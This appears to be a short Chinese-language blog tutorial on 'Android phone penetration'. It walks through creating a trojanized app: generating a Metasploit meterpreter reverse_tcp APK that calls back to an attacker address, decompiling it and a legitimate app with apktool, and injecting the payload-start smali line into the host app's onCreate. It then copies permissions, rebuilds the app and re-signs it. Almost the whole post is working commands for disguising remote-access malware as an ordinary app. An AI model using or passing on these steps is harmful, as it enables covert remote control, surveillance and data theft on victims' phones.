272 字
1 分钟
安卓手机渗透
2023-06-21

参考#

https://www.anquanke.com/post/id/86353 https://www.cxyzjd.com/article/polaris___/90700678 https://blog.csdn.net/weixin_52221158/article/details/125878898 https://www.freebuf.com/articles/network/279222.html https://www.freebuf.com/articles/system/332133.html https://www.freebuf.com/articles/network/247629.html

使用msfvenom生成一个预设定向连接kali主机的apk安卓应用#

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.10 lport=4444 R > hack.apk

使用apktool对两个软件进行反编译#

//刚刚生成的安卓应用
apktool d hack.apk -o hack
//要进行注入木马的安卓应用
apktool d wo.apk -o wo

注入钩子#

1.打开wo文件夹中的AndroidManifest.xml,寻找程序入口。 2.搜索Main和Launch关键词,定位到对应的smail文件。 3.打开对应的smail文件,搜索onCreate函数,找到bundle对象。 4.在onCreate函数,找到bundle对象,下面添加启动payload代码并且保存。

invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V

5.打开hack文件夹中的AndroidManifest.xml。 6.把AndroidManifest.xml中的<uses-permission android:开头的全部复制。 7.打开wo文件夹中的AndroidManifest.xml。 8.把刚刚复制到的粘贴到以<uses-permission android:开头的的下面并且保存。 9.把hack文件夹中的metasploit复制到wo文件夹中的smail/com/目录下。

编译#

把wo文件夹重新编译成wo.apk

apktool b wo -o wo.apk

生成密钥#

keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000

解释: keytool -genkeypair -keystore 密钥库名 -alias 密钥别名 -keyalg RSA -keysize 密钥大小 -validity 天数

签名#

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore wo.apk alias_name

分享

如果这篇文章对你有帮助,欢迎分享给更多人!

安卓手机渗透
https://vtdd.vip/posts/安卓手机渗透/
作者
浮生
发布于
2023-06-21
许可协议
CC BY-NC-SA 4.0

部分信息可能已经过时

目录